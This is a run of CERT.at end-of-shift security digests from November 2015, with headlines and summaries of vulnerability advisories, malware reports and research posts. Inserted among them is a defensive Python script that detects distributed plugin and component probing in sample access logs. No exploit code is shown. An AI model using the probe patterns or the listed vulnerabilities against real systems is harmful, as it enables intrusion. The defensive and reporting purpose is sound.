=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 17-11-2015 18:00 − Wednesday 18-11-2015 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Adobe releases out-of-band security patches - amazingly not for Flash ***
---------------------------------------------
ColdFusion, LiveCycle and Premiere get fixed ... Adobe says that it hasn't seen any evidence that these flaws are being exploited in the wild, but that users should patch anyway, just to be on the safe side - certainly before hackers reverse-engineer the updates and start abusing the bugs...
---------------------------------------------
http://www.theregister.co.uk/2015/11/17/adobe_releases_outofband_security_p…
*** Introducing Chuckle and the importance of SMB signing ***
---------------------------------------------
Digital signing is a feature of SMB designed to allow a recipient to confirm the authenticity of SMB packets and to prevent tampering during transit - this feature was first made available back in Windows NT 4.0 Service Pack 3. By default, only domain controllers require packets to be signed and this default behavior is usually seen in most corporate networks.
---------------------------------------------
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2015/novem…
*** Team Cymru: Free tools for incident response ***
---------------------------------------------
We at Team Cymru would like to be helpful to incident response vendors in implementing the USG's growing security strategy. To that end, we have identified a few of our free community resources (and one commercial service) that would be most useful to IR.
---------------------------------------------
https://blog.team-cymru.org/2015/11/free-tools-for-incident-response-and-a-…
*** How two seconds become two days ***
---------------------------------------------
At 3:37PM PST, we had a power blip in one of our datacenters. In those two seconds, over 1,000 systems blinked offline. As a non-profit, we don't have all of those niceties such as hot-hot datacenters or those newfangled UPSes. Instead, we do it the old fashioned way, which means we are susceptible to...
---------------------------------------------
http://blog.shadowserver.org/2015/11/17/how-two-seconds-become-two-days/
*** A flaw in D-Link Switches opens corporate networks to hack ***
---------------------------------------------
A flaw in certain D-Link switches can be exploited by remote attackers to access configuration data and hack corporate networks. The independent security researcher Varang Amin and the chief architect at Elastica's Cloud Threat Labs Aditya Sood have discovered a vulnerability in the D-Link Switches belonging to the DGS-1210 Series Gigabit Smart Switches. The security experts revealed...
---------------------------------------------
http://securityaffairs.co/wordpress/42054/hacking/d-link-switches-flaw.html
*** Blast from the Past: Blackhole Exploit Kit Resurfaces in Live Attacks ***
---------------------------------------------
The year is 2015 and a threat actor is using the defunct Blackhole exploit kit in active drive-by download campaigns via compromised websites.
---------------------------------------------
https://blog.malwarebytes.org/exploits-2/2015/11/blast-from-the-past-blackh…
*** Google VirusTotal - now with autoanalysis of OS X malware ***
---------------------------------------------
Google just announced that its virus classification and auto-analysis service, VirusTotal, is now officially interested in OS X malware.
---------------------------------------------
http://feedproxy.google.com/~r/nakedsecurity/~3/buCfkbvoJqQ/
*** Nishang: A Post-Exploitation Framework ***
---------------------------------------------
I was recently doing an external penetration test for one of our clients, where I got shell access to Windows Server 2012 (Internal WebServer sitting behind an IPS) with Administrative Privileges. It also appears to have an Antivirus installed on the system as everything I was uploading on to the machine was being deleted on...
---------------------------------------------
http://resources.infosecinstitute.com/nishang-a-post-exploitation-framework/
*** 10 dumb security mistakes sys admins make ***
---------------------------------------------
Security isn't merely a technical problem -- it's a people problem. There's only so much technology you can throw at a network before dumb human mistakes trip you up. But guess what? Those mistakes are often committed by the very people who should know better: system administrators and other IT staff.
---------------------------------------------
http://www.cio.com/article/3006147/security/10-dumb-security-mistakes-sys-a…
*** SANS Pentest Summit: Evil DNS tricks by Ron Bowes - slide deck ***
---------------------------------------------
Things I'm gonna talk about:
* How to use DNS in pentesting
* How to use DNS's indirect nature
* DNS tunnelling (dnscat2)
---------------------------------------------
https://docs.google.com/presentation/d/1Jxh6PPO9JbUqXwOCTQFyA00uQoFMDBh-1Pe…
*** Cyber Security Assessment Netherlands 2015: cross-border cyber security approach necessary ***
---------------------------------------------
The CSAN has five Core Findings:
* Cryptoware and other ransomware constitute the preferred business model for cyber criminals
* Geopolitical tensions manifest themselves increasingly often in (impending) digital security breaches
* Phishing is often used in targeted attacks and can barely be recognised by users
* Availability becomes more important as alternatives to IT systems are disappearing
* Vulnerabilities in software are still the Achilles heel of digital security
---------------------------------------------
https://www.ncsc.nl/english/current-topics/Cyber+Security+Assessment+Nether…
*** Inside the Conficker-Infected Police Body Cameras ***
---------------------------------------------
A Florida integrator who discovered the Conficker worm lurking in body cameras meant for police use takes Threatpost inside the story, including a frustrating disclosure with a disbelieving manufacturer.
---------------------------------------------
http://threatpost.com/inside-the-conficker-infected-police-body-cameras/115…
*** EMC VPLEX GeoSynchrony Default Log Level Lets Local Users View Passwords ***
---------------------------------------------
http://www.securitytracker.com/id/1034169
*** F5 security advisory: NTP vulnerability CVE-2015-5300 ***
---------------------------------------------
A man-in-the-middle attacker able to intercept network time protocol (NTP) traffic between a connecting client and an NTP server could use this flaw to force that client to make multiple steps larger than the panic threshold, effectively changing the time to an arbitrary value at any time.
---------------------------------------------
https://support.f5.com/kb/en-us/solutions/public/k/10/sol10600056.html?ref=…
*** Atlassian Hipchat XSS to RCE ***
---------------------------------------------
Topic: Atlassian Hipchat XSS to RCE
Risk: Medium
Text: Two issues exist in Atlassian's HipChat desktop client that allow an attacker to retrieve files or execute remote code when a...
---------------------------------------------
https://cxsecurity.com/issue/WLB-2015110164
*** [HTB23272]: RCE and SQL injection via CSRF in Horde Groupware ***
---------------------------------------------
Product: Horde Groupware v5.2.10
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
Risk level: High
Creator: http://www.horde.org
Advisory Publication: September 30, 2015 [without technical details]
Public Disclosure: November 18, 2015
CVE Reference: CVE-2015-7984
CVSSv2 Base Score: 8.3 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H]
Vulnerability Details: High-Tech Bridge Security Research Lab discovered three Cross-Site Request Forgery (CSRF) vulnerabilities in a popular collaboration...
---------------------------------------------
https://www.htbridge.com/advisory/HTB23272
*** Security Advisory - Information Leak Vulnerability in Huawei DSM Product ***
---------------------------------------------
There is an information leak vulnerability in the DSM (Document Security Management) product. The DSM does not clear the clipboard after data in a secure file opened using the DSM is copied and the secure file is closed. Data in the clipboard can be copied into common documents that do not use the DSM, leading to information leaks. (Vulnerability ID: HWPSIRT-2015-09009) Huawei has released software updates to fix these vulnerabilities.
---------------------------------------------
http://www1.huawei.com/en/security/psirt/security-bulletins/security-adviso…
*** Symantec Endpoint Protection Elevation of Privilege Issues SYM15-011 ***
---------------------------------------------
11/16/2015 - Assigned a new CVE ID, CVE-2015-8113 and Bugtraq ID 77585, to the SEP Client Binary Planting Partial Fix to differentiate between the original fix released in 12.1-RU6-MP1 and the updated issue and fix released in 12.1-RU6-MP3
---------------------------------------------
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se…
*** Cisco Security Advisories ***
---------------------------------------------
*** Cisco Firepower 9000 USB Kernel Denial of Service Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Firepower 9000 Command Injection at Management I/O Command-Line Interface Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Firepower 9000 Persistent Cross-Site Scripting Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Firepower 9000 Cross-Site Request Forgery Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Firepower 9000 Series Switch Clickjacking Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Firepower 9000 Arbitrary File Read Access Script Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-4852) ***
http://www.ibm.com/support/docview.wss?uid=swg21970575
---------------------------------------------
*** IBM Security Bulletin: IBM Sterling B2B Integrator has Cross Site Scripting vulnerabilities in Queue Watcher (CVE-2015-7431) ***
http://www.ibm.com/support/docview.wss?uid=swg21970676
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Runtime Environment Java Technology Edition, Version 1.5.0 and 1.7.0 affect IBM Flex System Manager (FSM) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022835
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK 7 affect IBM Systems Director Storage Control (CVE-2015-2613 CVE-2015-2601 CVE-2015-2625 CVE-2015-1931 ) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022936
---------------------------------------------
*** IBM Security Bulletin: IBM Tivoli Monitoring (CVE-2015-1829, CVE-2015-3183, CVE-2015-1283, CVE-2015-4947, CVE-2015-2808) ***
http://www.ibm.com/support/docview.wss?uid=swg21970056
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Runtime Environment Java Technology Edition, Version 1.5.0 and 1.7.0 affect IBM Flex System Manager (FSM) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022820
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 16-11-2015 18:00 − Tuesday 17-11-2015 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Cyber crooks actively hijacking servers with unpatched vBulletin installations ***
---------------------------------------------
Administrators of vBulletin installations would do well to install the latest vBulletin Connect updates as soon as possible, as cyber crooks are actively searching for servers running vulnerable versi...
---------------------------------------------
http://www.net-security.org/secworld.php?id=19113
*** Windows driver signing bypass by Derusbi ***
---------------------------------------------
Derusbi is an infamous piece of malware. The oldest identified version was compiled in 2008. It was used on well-known hacks such as the Mitsubishi Heavy Industries hack discovered in October 2011 or the Anthem hack discovered in 2015.
---------------------------------------------
http://www.sekoia.fr/blog/windows-driver-signing-bypass-by-derusbi/
*** Developers Are (still) From Mars, Infosec People (still) From Venus ***
---------------------------------------------
In March 2011, Brian Honan contributed to an issue of the INSECURE magazine with an article called "Management are from Mars, information security professionals are from Venus". This title comes from John Gray's worldwide bestseller where he presents the relations between men and women. Still today, we can reuse this subject for many purposes. Last week, I...
---------------------------------------------
https://blog.rootshell.be/2015/11/17/developers-mars-infosec-people-venus/
*** Why Algebraic Eraser may be the riskiest cryptosystem you've never heard of ***
---------------------------------------------
Researchers say there's a fatal flaw in proposed "Internet of things" standard.
---------------------------------------------
http://arstechnica.com/security/2015/11/why-algebraic-eraser-may-be-the-mos…
*** Cyber Security Assessment Netherlands 2015: cross-border cyber security approach necessary ***
---------------------------------------------
Cybercrime and digital espionage remain the largest threat to digital security in the Netherlands. Geopolitical developments like international conflicts and political sensitivities have a major impact on the scope of this threat. These are key findings from the Cyber Security Assessment Netherlands (CSAN), presented to the House of Representatives by State Secretary Dijkhoff in October, and now available in English.
---------------------------------------------
https://www.ncsc.nl/english/current-topics/news/cyber-security-assessment-n…
*** Gas and oil industry: easy targets for hackers ***
---------------------------------------------
Security researchers warn that cyber criminals could use comparatively simple methods to take control of a large part of the world's oil production.
---------------------------------------------
http://heise.de/-2922912
*** Bugtraq: Open-Xchange Security Advisory 2015-11-17 ***
---------------------------------------------
PGP public keys allow specifying arbitrary "User ID" information that gets encoded into the public key and is presented to OX Guard users at "Guard PGP Settings". Public keys containing such content are still valid. Therefore they can be distributed and, in case the uid field contains javascript code, they can be used to inject code.
---------------------------------------------
http://www.securityfocus.com/archive/1/536923
*** Cisco Firepower 9000 Unauthenticated File Access Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** D-Link DIR-645 UPNP Buffer Overflow ***
---------------------------------------------
Topic: D-Link DIR-645 UPNP Buffer Overflow
Risk: High
Text: ## Advisory Information
Title: Dlink DIR-645 UPNP Buffer Overflow
Vendors contacted: William Brown <william.brown(a)dlink.com...
---------------------------------------------
https://cxsecurity.com/issue/WLB-2015110133
*** D-Link DIR-815 Buffer Overflow / Command Injection ***
---------------------------------------------
Topic: D-Link DIR-815 Buffer Overflow / Command Injection
Risk: High
Text: ## Advisory Information
Title: DIR-815 Buffer overflows and Command injection in authentication and HNAP functionalities
Ve...
---------------------------------------------
https://cxsecurity.com/issue/WLB-2015110135
*** Huawei Security Notice - Statement on Seclists.org Revealing Security Vulnerability in Huawei P8 Smart Phone ***
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-notices…
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 13-11-2015 18:00 − Monday 16-11-2015 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** BitLocker encryption can be defeated with trivial Windows authentication bypass ***
---------------------------------------------
Companies relying on Microsoft BitLocker to encrypt the drives of their employees' computers should install the latest Windows patches immediately. A researcher disclosed a trivial Windows authentication bypass, fixed earlier this week, that puts data on BitLocker-encrypted drives at risk. Ian Haken, a researcher with software security testing firm Synopsys, demonstrated the attack Friday at the Black Hat Europe security conference in Amsterdam. The issue affects Windows computers that are part...
---------------------------------------------
http://www.cio.com/article/3005178/bitlocker-encryption-can-be-defeated-wit…
*** The November 2015 issue of our SWITCH Security Report is available! ***
---------------------------------------------
Dear Reader! A new issue of our monthly SWITCH Security Report has just been released. The topics covered in this report are: No safe harbour in the Land of the Free - EU Court of Justice restricts data transfer to...
---------------------------------------------
http://securityblog.switch.ch/2015/11/13/the-november-2015-issue-of-our-swi…
*** Web security: data leak through dynamic scripts ***
---------------------------------------------
Modern websites frequently generate dynamic JavaScript code. If that code contains private data, third-party websites can read it out. In a study by security researchers, a third of the websites examined were affected by this problem.
---------------------------------------------
http://www.golem.de/news/websicherheit-datenleck-durch-dynamische-skripte-1…
*** Op-ed: (How) did they break Diffie-Hellman? ***
---------------------------------------------
Relax - it's not true that researchers have broken the Diffie-Hellman key exchange protocol.
---------------------------------------------
http://arstechnica.com/security/2015/11/op-ed-how-did-they-break-diffie-hel…
*** More POS malware, just in time for Christmas ***
---------------------------------------------
VXers stuff evidence-purging malware in retailer stockings. Threat researchers are warning of two pieces of point of sales malware that have gone largely undetected during years of retail wrecking and now appear likely to earn VXers a haul over the coming festive break.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2015/11/16/more_pos_ma…
*** Black Hat Europe 2015 slides ***
---------------------------------------------
Briefings - November 12-13
---------------------------------------------
https://www.blackhat.com/eu-15/briefings.html
*** Choosing the Right Cryptography Library for your PHP Project: A Guide ***
---------------------------------------------
... conventional wisdom states that you almost certainly should not try to design your own cryptography. Instead, you should use an existing cryptography library. Okay, great. So which PHP cryptography library should I use? That depends on your exact requirements. Let's look at some good choices. (We won't cover any terrible choices.)
---------------------------------------------
https://paragonie.com/blog/2015/11/choosing-right-cryptography-library-for-…
*** Apple OS X authentication issue when recovering from sleep mode ***
---------------------------------------------
When Apple Remote Desktop is used in full screen mode and the remote connection is alive upon entering sleep mode, the text entered in the dialog box upon recovering from sleep mode is sent to the remotely connected host instead of the local host. This may result in command execution at the remote host.
---------------------------------------------
http://jvn.jp/en/jp/JVN56210048/index.html
*** Program library libpng needs security updates ***
---------------------------------------------
A vulnerability in libpng can serve as an entry point for attackers to crash applications.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Programmbibliothek-libpng-verlangt-n…
*** Containers: CoreOS releases CVE service as open source ***
---------------------------------------------
The Linux distributor CoreOS has released its container security tool Clair as open-source software. The tool is able to scan every single container layer for vulnerabilities and, if something is found, to report the type of threat. For this, Clair draws on the CVE database (Common Vulnerabilities and Exposures) and similar resources from Red Hat, Ubuntu and Debian. However, Clair does not help to...
---------------------------------------------
http://www.heise.de/newsticker/meldung/Container-CoreOS-gibt-CVE-Service-al…
*** LiME - Linux Memory Extractor ***
---------------------------------------------
Features:
* Full Android memory acquisition
* Acquisition over network interface
* Minimal process footprint
---------------------------------------------
http://www.kitploit.com/2015/11/lime-linux-memory-extractor.html
*** DD4BC / Armada Collective: extortion via DDoS ***
---------------------------------------------
16 November 2015. This is, once again, nothing really new. Distributed denial of service attacks have been around for a long time; it may have started with turf fights in the red-light scene, the attack on Estonia in 2007 brought the topic into the press in a big way, and at the latest since the attacks of the "Anonymous" movement the problem should be generally known. There is also a section on this in our last...
---------------------------------------------
http://www.cert.at/services/blog/20151116114639-1627.html
*** BlackBerry Enterprise Server Input Validation Flaw in Management Console Lets Remote Users Conduct Cross-Site Scripting Attacks ***
---------------------------------------------
http://www.securitytracker.com/id/1034154
*** D-link wireless router DIR-816L Cross-Site Request Forgery (CSRF) vulnerability ***
---------------------------------------------
Cross-Site Request Forgery (CSRF) vulnerability in the DIR-816L wireless router enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.
---------------------------------------------
http://www.securityfocus.com/archive/1/536886
*** Debian: strongswan security update ***
---------------------------------------------
Tobias Brunner found an authentication bypass vulnerability in strongSwan, an IKE/IPsec suite. Due to insufficient validation of its local state the server implementation of the EAP-MSCHAPv2 protocol in the eap-mschapv2 plugin can be tricked into successfully concluding the authentication without providing valid credentials.
---------------------------------------------
https://lists.debian.org/debian-security-announce/2015/msg00303.html
*** Cisco Security Advisories ***
---------------------------------------------
*** Cisco Videoscape Distribution Suite Service Manager Information Disclosure Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco IOS Software Virtual PPP Interfaces Security Bypass Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco FireSIGHT Management Center Certificate Validation Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Prime Collaboration Assurance Cross-Site Request Forgery Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** IBM Security Bulletins ***
---------------------------------------------
*** Apache Commons Vulnerability for handling Java object deserialization ***
http://www.ibm.com/support/docview.wss?uid=swg21970575
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in GSKit affects IBM DataPower Gateways (CVE-2015-1788) ***
http://www.ibm.com/support/docview.wss?uid=swg21969271
---------------------------------------------
*** IBM Security Bulletin: Certain cookies missing Secure attribute in IBM DataPower Gateways (CVE-2015-7427) ***
http://www.ibm.com/support/docview.wss?uid=swg21969342
---------------------------------------------
*** Security Bulletin: Vulnerabilities in OpenSSL affect IBM System Networking RackSwitch (CVE-2015-1788, CVE-2015-1789, CVE-2015-1792) ***
http://www.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5098801
---------------------------------------------
*** IBM Security Bulletin: IBM Cúram Social Program Management contains an Apache Batik Vulnerability (CVE-2015-0250) ***
http://www.ibm.com/support/docview.wss?uid=swg21970112
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in current releases of the IBM SDK, Java Technology Edition ***
http://www.ibm.com/support/docview.wss?uid=swg21969225
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in qemu-kvm affects IBM SmartCloud Provisioning for IBM Software Virtual Appliance ***
http://www.ibm.com/support/docview.wss?uid=swg21968929
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in FUSE affects PowerKVM (CVE-2015-3202) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022878
---------------------------------------------
*** IBM Security Bulletin: Lotus Protector for Mail Security affected by Opensource PHP Vulnerabilities (CVE-2015-6836 CVE-2015-6837 CVE-2015-6838) ***
http://www.ibm.com/support/docview.wss?uid=swg21968353
---------------------------------------------
*** IBM Security Bulletin: GPFS security vulnerabilities in IBM SONAS (CVE-2015-4974 and CVE-2015-4981) ***
http://www.ibm.com/support/docview.wss?uid=ssg1S1005425
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in Mozilla gdk-pixbuf2 affects PowerKVM (CVE-2015-4491) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022833
---------------------------------------------
*** Vulnerability in bind affects AIX (CVE-2015-5722) ***
http://www.ibm.com/support/
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 12-11-2015 18:00 − Friday 13-11-2015 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Using Facebook to log in - safe or not? ***
---------------------------------------------
Open up your favorite web site and you can see what this is about right away. There are in many cases two options, an ordinary log-in and "Log in with Facebook". Have you been using the Facebook option? It is quite convenient, isn't it? I was talking to a journalist about privacy a while ago...
---------------------------------------------
http://safeandsavvy.f-secure.com/2015/11/12/using-facebook-to-log-in-safe-o…
*** MIG Mozilla InvestiGator ***
---------------------------------------------
Search through your infrastructure in real-time from the command line
---------------------------------------------
https://jve.linuxwall.info/ressources/taf/LISA15/
*** ZipInputStream Armageddon ***
---------------------------------------------
Again, again, again .. and again these bugs are turning up because of the general lack of validation occurring on the ZIP contents. In most cases this is probably due to the fact that developers are making assumptions that these ZIP files are not being tampered with, and therefore don't really consider the ramifications.
---------------------------------------------
http://rotlogix.com/2015/11/12/zipinputstream-armageddon/
*** botfrei.de: ad-blocker sanctions "the wrong way" ***
---------------------------------------------
The "Anti-Botnet Advice Centre" botfrei.de and its operator, the eco Association of the Internet Industry, consider online advertising important. Sanctions against ad blockers, however, would leave important user interests unconsidered.
---------------------------------------------
http://heise.de/-2920022
*** One BadBarcode Spoils Whole Bunch ***
---------------------------------------------
At PacSec 2015, researchers demonstrated attacks using poisoned barcodes scanned by numerous keyboard wedge barcode scanners to open a shell on a machine and virtually type control commands.
---------------------------------------------
http://threatpost.com/one-badbarcode-spoils-whole-bunch/115362/
*** Google Reconnaissance, Sprinter-style, (Fri, Nov 13th) ***
---------------------------------------------
When doing security assessments or penetration tests, there's a significant amount of findings that you can get from search engines. For instance, if a client has sensitive information or any number of common vulnerabilities, you can often find those with a Google or Bing search, without sending a single packet to the client's infrastructure. This concept is called Google dorking, and was pioneered by Johnny Long back in the day (he has since moved on to other projects see...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20375&rss
*** Researchers Discover Two New Strains of POS Malware ***
---------------------------------------------
Two new and different strains of point of sale malware have come to light, including one that's gone largely undetected for the past five years.
---------------------------------------------
http://threatpost.com/researchers-discover-two-new-strains-of-pos-malware/1…
*** Spring Social Core Vulnerability Disclosure ***
---------------------------------------------
Today we would like to announce the discovery of a vulnerability in the Spring Social Core library. Spring Social provides Java bindings to popular service provider APIs like GitHub, Facebook, Twitter, etc., and is widely used by developers. All current versions (1.0.0.RELEASE to 1.1.2.RELEASE) of the library are affected by this vulnerability.
---------------------------------------------
https://blog.srcclr.com/spring-social-core-vulnerability-disclosure/
*** Unitronics VisiLogic OPLC IDE Vulnerabilities ***
---------------------------------------------
This advisory was originally posted to the US-CERT secure Portal library on November 3, 2015, and is being released to the NCCIC/ICS-CERT web site. This advisory provides mitigation details for vulnerabilities in Unitronics VisiLogic OPLC IDE.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-15-274-02
*** Security Advisory - App Validity Check Bypass Vulnerability in Huawei P7 Smartphone ***
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor…
*** Security Notice - Statement on Black Hat Europe 2015 Revealing Security Vulnerability in Huawei P7 Smart Phone ***
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-notices…
*** DFN-CERT-2015-1761: Jenkins: Multiple vulnerabilities allow, among other things, execution of arbitrary code ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2015-1761/
*** Cisco AnyConnect Secure Mobility Client Arbitrary File Move Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco IOS Software Tunnel Interfaces Security Bypass Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco Aironet 1800 Series Access Point SSHv2 Denial of Service Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
=======================
= End-of-Shift report =
=======================
Timeframe: Mittwoch 11-11-2015 18:00 − Donnerstag 12-11-2015 18:01
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Distributed Vulnerability Search - Told via Access Logs ***
---------------------------------------------
Sometimes just a few lines of access logs can tell a whole story: Many ongoing attacks against WordPress and Joomla sites use a collection of known vulnerabilities in many different plugins, themes and components. This helps hackers maximize the number of sites they can compromise. Google Dorks: Do you ever think about how hackers find...
---------------------------------------------
https://blog.sucuri.net/2015/11/distributed-vulnerability-search-told-via-a…
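As an added illustration of reading that story out of access logs (example code written for this digest, not from the Sucuri post): a small Python script that parses combined-format log lines, keeps only 404s against plugin, theme or Joomla component paths, and reports targets probed from several unrelated source addresses. The log lines are constructed, and the plugin and component names in them are placeholders, not real vulnerable add-ons.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" log format; only the fields needed here are captured.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log: four unrelated hosts each probe the same non-existent
# plugin path once, two probe a Joomla component, one legitimate visitor browses.
# "example-upload" and "com_example" are placeholders, not real vulnerable add-ons.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Nov/2015:10:01:02 +0000] "GET /wp-content/plugins/example-upload/upload.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"
198.51.100.7 - - [11/Nov/2015:10:01:03 +0000] "GET /wp-content/plugins/example-upload/upload.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"
192.0.2.9 - - [11/Nov/2015:10:01:05 +0000] "GET /wp-content/plugins/example-upload/upload.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.0.113.77 - - [11/Nov/2015:10:01:09 +0000] "GET /wp-content/plugins/example-upload/upload.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"
198.51.100.8 - - [11/Nov/2015:10:02:11 +0000] "GET /index.php?option=com_example&task=upload HTTP/1.1" 404 209 "-" "Mozilla/5.0"
192.0.2.10 - - [11/Nov/2015:10:02:12 +0000] "GET /index.php?option=com_example&task=upload HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.0.113.200 - - [11/Nov/2015:10:03:00 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.200 - - [11/Nov/2015:10:03:04 +0000] "GET /about HTTP/1.1" 200 3044 "http://example.test/" "Mozilla/5.0"
"""


def parse(log_text):
    """Yield one dict per parseable line; lines that do not match are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()


def is_component_probe(target, status):
    """A 404 against a plugin/theme/component path is a request for code that is not
    installed here: the hallmark of a scanner walking a list of known-vulnerable add-ons."""
    path, _, query = target.partition("?")
    looks_like_addon = (
        path.startswith(("/wp-content/plugins/", "/wp-content/themes/"))
        or re.search(r"(^|&)option=com_", query) is not None
    )
    return looks_like_addon and status == "404"


def distributed_probes(log_text, min_sources=3):
    """Group probes by target and report targets hit by at least `min_sources`
    distinct source addresses: one campaign spread over many IPs."""
    sources = defaultdict(set)
    for rec in parse(log_text):
        if is_component_probe(rec["target"], rec["status"]):
            sources[rec["target"]].add(rec["ip"])
    return {target: sorted(ips) for target, ips in sources.items() if len(ips) >= min_sources}


if __name__ == "__main__":
    for target, ips in distributed_probes(SAMPLE_LOG).items():
        print(f"{len(ips)} sources probed {target}: {', '.join(ips)}")
```

On a real log the interesting output is the list of paths that many single-request addresses all ask for: each address sends only a request or two, so per-IP rate limiting never fires, but the shared target list gives the campaign away, and those targets double as a block list or as honeytoken paths to alert on.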
*** Latest Android phones hijacked with tidy one-stop-Chrome-pop ***
---------------------------------------------
Chinese researcher burns exploit for ski trip. PacSec: Google's Chrome for Android has been popped in a single exploit that could lead to the compromise of any handset.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2015/11/12/mobile_pwn2…
*** Samsung S6 calls open to man-in-the-middle base station snooping ***
---------------------------------------------
Their cheap man-in-the-middle attack requires an OpenBTS base station to be established and located near target handsets. Handsets will automatically connect to the bogus station. The malicious base station then pushes firmware to the phone's baseband processor (the chip that handles voice calls, and which isn't directly accessible to end users). ... The Register would speculate that since the Qualcomm silicon in question isn't unique to Samsung kit, other researchers are probably setting to work...
---------------------------------------------
http://www.theregister.co.uk/2015/11/12/mobile_pwn2own1/
*** Trade secrets: security researcher warns against TTIP ***
---------------------------------------------
The TTIP free trade agreement has another group of opponents: IT security researchers. At least that is what René Pfeiffer, organiser of DeepSec in Vienna, says. He fears that it will suppress information about security risks even further.
---------------------------------------------
http://www.golem.de/news/geschaeftsgeheimnisse-sicherheitsforscher-warnt-vo…
*** Outlook problems: Microsoft fixes security update for Windows ***
---------------------------------------------
Microsoft has withdrawn a faulty update and replaced it with a fixed version. After installation, Outlook should no longer crash. But there are still further problems.
---------------------------------------------
http://heise.de/-2919456
*** Pentesting SAP Applications : An Introduction ***
---------------------------------------------
Introduction to SAP: SAP (Systems-Applications-Products) is a software suite that offers standard business solutions; it is used by thousands of customers across the globe to manage their business. In other words, SAP systems provide the capability to manage financial, asset, and cost accounting, production operations and materials, personnel and many more tasks. Before we jump...
---------------------------------------------
http://resources.infosecinstitute.com/pen-stesting-sap-applications-part-1/
*** EMV Protocol Fuzzer ***
---------------------------------------------
The world-wide introduction of the Europay, MasterCard and Visa standard (EMV), to facilitate communication between smartcards and EMV-enabled devices, such as point-of-sale (POS) terminals and automatic teller machines (ATMs), has altered the security landscape of the daily markets. Surprisingly limited public research exists addressing security aspects of hardware and software specific implementations. This is something we wanted to put right and therefore started a new research programme to...
---------------------------------------------
https://labs.mwrinfosecurity.com/blog/2015/11/11/emv-protocol-fuzzer/
*** Got a time machine? Good, you can brute-force 2FA ***
---------------------------------------------
